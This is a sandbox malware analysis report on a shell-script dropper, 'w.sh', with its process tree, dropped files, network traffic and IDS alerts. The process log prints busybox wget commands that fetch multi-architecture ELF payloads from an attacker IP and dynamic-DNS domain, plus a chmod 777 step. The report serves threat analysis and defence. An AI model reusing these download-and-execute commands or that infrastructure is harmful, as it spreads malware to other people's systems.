File name: w.sh
Full analysis: https://app.any.run/tasks/ed4900b4-dc99-4b1c-8012-20763a335cb9
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:34:22
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: D31100C4C6DE02B96FA00F2D47007426
SHA1: 1D9E905DD47B53E52DD4F4599E6C65EDFBB1A886
SHA256: 4A1A0DC3D4E1CFCF57C9515839AB8F5D690733BB196538311BCE58479E81B440
SSDEEP: 24:FJJbzBglJJbT1lJJbxNIIolJJbdKSflJJbjTllJJbTllJJbpl95lJJbf9mlJJbDC:VXBg1H115o1Rxf1HTl1nl1b95179m1XC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • main_x86_64 (PID: 41436)
      • main_x86_64 (deleted) (PID: 41437)
      • main_x86_64 (deleted) (PID: 41439)
  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • busybox (PID: 41397)
      • busybox (PID: 41406)
      • busybox (PID: 41415)
      • busybox (PID: 41434)
      • busybox (PID: 41419)
      • busybox (PID: 41427)
      • busybox (PID: 41423)
      • busybox (PID: 41438)
    • Starts itself from another location

      • main_x86_64 (PID: 41436)
    • Executes commands using command-line interpreter

      • bash (PID: 41392)
      • sudo (PID: 41391)
    • Modifies file or directory owner

      • sudo (PID: 41388)
    • Connects to unusual port

      • main_x86_64 (deleted) (PID: 41437)
  • INFO

    No info indicators.
No Malware configuration.
No data.
Total processes: 180
Monitored processes: 46
Malicious processes: 3
Suspicious processes: 1


Process information

PID: 41387
CMD: /bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh "
Path: /usr/bin/dash
Parent process: UbvyYXL4x2mYa65Q
User: root
Integrity Level: UNKNOWN
Exit code: 32512
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41388
CMD: sudo chown user /tmp/w.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41389
CMD: chown user /tmp/w.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41390
CMD: chmod +x /tmp/w.sh
Path: /usr/bin/chmod
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41391
CMD: sudo -iu user /tmp/w.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 32512
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  /usr/lib/x86_64-linux-gnu/libselinux.so.1
  /usr/libexec/sudo/libsudo_util.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libc.so.6
  /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  /usr/libexec/sudo/sudoers.so
  /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41392
CMD: -bash --login -c \/tmp\/w\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 32512
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41393
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41394
CMD: busybox wget http://41.216.188.159/main_arm
Path: /usr/bin/busybox
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images): none listed

PID: 41395
CMD: chmod 777 main_arm
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images):
  /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41396
CMD: -bash --login -c \/tmp\/w\.sh
Path: /usr/bin/bash
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 32512
Modules (Images): none listed
Executable files: 0
Suspicious files: 8
Text files: 0
Unknown types: 0

Dropped files

PID    Process  Filename                          Type
41397  busybox  /home/user/main_arm5              o
41406  busybox  /home/user/main_arm7              o
41415  busybox  /home/user/main_sh4               binary
41419  busybox  /home/user/main_ppc               binary
41423  busybox  /home/user/main_mips              binary
41427  busybox  /home/user/main_mpsl              binary
41434  busybox  /home/user/main_x86_64 (deleted)  binary
41438  busybox  /home/user/main_m68k              binary

(The MD5 and SHA256 fields are empty in the report for every dropped file.)
HTTP(S) requests: 11
TCP/UDP connections: 138
DNS requests: 125
Threats: 123

HTTP requests

PID    Process  Method  HTTP Code  IP                 URL                                    CN       Reputation
-      -        GET     204        91.189.91.98:80    http://connectivity-check.ubuntu.com/  unknown  whitelisted
41397  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_arm5        unknown  unknown
41406  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_arm7        unknown  unknown
41415  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_sh4         unknown  unknown
41419  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_ppc         unknown  unknown
41423  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_mips        unknown  unknown
41443  busybox  GET     404        41.216.188.159:80  http://41.216.188.159/main_i586        unknown  unknown
41431  busybox  GET     404        41.216.188.159:80  http://41.216.188.159/main_sparc       unknown  unknown
41434  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_x86_64      unknown  unknown
41438  busybox  GET     200        41.216.188.159:80  http://41.216.188.159/main_m68k        unknown  unknown

(The Type and Size columns are empty in the report for every request.)

Connections

PID    Process       IP                  Domain                         ASN                                CN  Reputation
-      -             91.189.91.49:80     connectivity-check.ubuntu.com  Canonical Group Limited            US  whitelisted
-      -             185.125.190.98:80   connectivity-check.ubuntu.com  Canonical Group Limited            GB  whitelisted
484    avahi-daemon  224.0.0.251:5353    -                              -                                  -   unknown
-      -             91.189.91.98:80     connectivity-check.ubuntu.com  Canonical Group Limited            US  whitelisted
-      -             212.102.56.179:443  odrs.gnome.org                 Datacamp Limited                   DE  whitelisted
512    snapd         185.125.188.59:443  api.snapcraft.io               Canonical Group Limited            GB  whitelisted
512    snapd         185.125.188.57:443  api.snapcraft.io               Canonical Group Limited            GB  whitelisted
512    snapd         185.125.188.54:443  api.snapcraft.io               Canonical Group Limited            GB  whitelisted
512    snapd         185.125.188.58:443  api.snapcraft.io               Canonical Group Limited            GB  whitelisted
41394  busybox       41.216.188.159:80   vagner.sytes.net               Private-Hosting di Cipriano oscar  DE  suspicious

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.49
  • 91.189.91.49
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.97
  • 185.125.190.96
whitelisted
google.com
  • 142.250.184.206
  • 2a00:1450:4001:81d::200e
whitelisted
odrs.gnome.org
  • 212.102.56.179
  • 169.150.255.184
  • 195.181.175.41
  • 195.181.170.19
  • 169.150.255.181
  • 207.211.211.27
  • 37.19.194.81
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::344
whitelisted
vagner.sytes.net
  • 41.216.188.159
unknown
13.100.168.192.in-addr.arpa
unknown

Threats

PID    Process                Class                                  Message
41397  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41406  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41415  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41419  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41423  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41427  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41437  main_x86_64 (deleted)  Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41434  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41438  busybox                Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
41437  main_x86_64 (deleted)  Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
No debug info